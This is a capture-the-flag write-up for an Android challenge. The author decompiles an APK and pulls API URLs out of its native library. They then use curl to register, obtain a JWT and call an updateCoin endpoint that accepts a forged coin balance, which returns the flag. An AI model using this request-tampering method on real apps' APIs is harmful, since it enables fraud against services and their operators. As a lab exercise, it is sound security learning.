after decompiling the given apk, and reading some of the source code, it's so
apparent two of the java code files get input (one for registeration and one
for login), and each of those 3 side java files also call a native function
with same name each in a native library.

I opened each library using cutter and decompiled the `stringFromJNI`
functions and got the strings those returned:  
```  
http://37.152.186.157/api/login  
http://37.152.186.157/api/register  
http://37.152.186.157/api/updateCoin  
```

the fields passed to these api endpoints are very apparent in java code files.

so... I registered and got a jwt token:  
```  
$ curl -X POST -d 'name=someone' -d '[email protected]' -d
'password=securitylaughes' http://37.152.186.157/api/register  
{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJhdWQiOiIxIiwianRpIjoiNGJjMjQ4OTJhYTIzZWRjMzM1YTdjN2NkYmI4OTIwMjlhZjEyMTZjYzRkZDg1NWJhMjQxMDM4MjI4MDQzY2VmY2Y1NzMxMzBjMmIyYTQ2YzgiLCJpYXQiOjE2MDM5ODczNTMsIm5iZiI6MTYwMzk4NzM1MywiZXhwIjoxNjM1NTIzMzUzLCJzdWIiOiIxMjciLCJzY29wZXMiOltdfQ.emDVUrS_haOlprK53U0syul0JTwUWsYEXhH6v2cD1niMExLfPNKzDKYVWTH6ryhmdonVDb-n2R7sb6qpwhbQ33x6a7MrblJlUD2zmViCZ-2YCuzblwpn0waSIpGmihXRmZUboiFxdqQIoeR5h6vB2vNZC0caJ9X66BW6U8AKrNvfUZFFqJl-
V_3YJ5xGnZ1IjWrS39q5t7YOHBd7MxUWBLO2P4mkrB9cqWP55Rf7mCyzZ0tawcQgmgoZdlD5Ukz5UppPHHT9JiCEffrj-
qRe_r9DKD8pm09AAS8EjgfJBdlld-_IfPRklnaEFphMe3lKhZ-
rTt83BKNPkCYEZB5EmMEKIe5eCJUZH2BUSOjB-y3Xj9SCVQcsQdJ5i5Nu_aPnJASllwbw_U3HXY-
SW9KZHeV1s-MRIU7ccFywW_Fqve5KSnI3wngj4yoGk7M2MoPznwkEiqfI54eLLD3ZC-
ryL0kG7MbwGsJTPMx6QmHyMMVF3IH2b8JvojPDpHFHopDWq-0N1Rgj82Y4AVOKwlLqAUJzqa7UGQ0ZTgJaTBjjNENPf9_5PpC7q4X0xHFDHBtYBJLHo1pDHFK5p-B7MvLgHnJ-
ND4_iVu9R2KrTrlMKc-9JHbah9m0wI90hiUYuBeKM3L6PCeJwqrM6F_PBvJvwQB2iltdorUkKNpunWskRhQ","coinCount":null,"message":"Signed
Up"}  
```

I saved the jwt token in a bash variable `token` for ease of use on later api
calls.

now having a token and updateCoin api endpoint, I tried to change the coin
amount as asked:  
```  
$ curl -X POST -H "Authorization: Bearer $token" -H 'Content-Type:
application/json' -d "{\"token\": \"$token\", \"coinCount\":
\"2000000000000000\"}" http://37.152.186.157/api/updateCoin  
{"message":"The purchase was
successful","coinCount":"2000000000000000","flag":"ZmRzdnNkRlNEcWUzQFFxZURXRUZEU1ZGU0RTNTVkc2Y1ZmV2c0RGcnEzNSRSI3J3ZnNlZnJ3IyQjJSNA"}  
```

and we got the flag:
`RaziCTF{ZmRzdnNkRlNEcWUzQFFxZURXRUZEU1ZGU0RTNTVkc2Y1ZmV2c0RGcnEzNSRSI3J3ZnNlZnJ3IyQjJSNA}`

this challenge could've been solved by either frida or wireshark (since http
and not secure) too...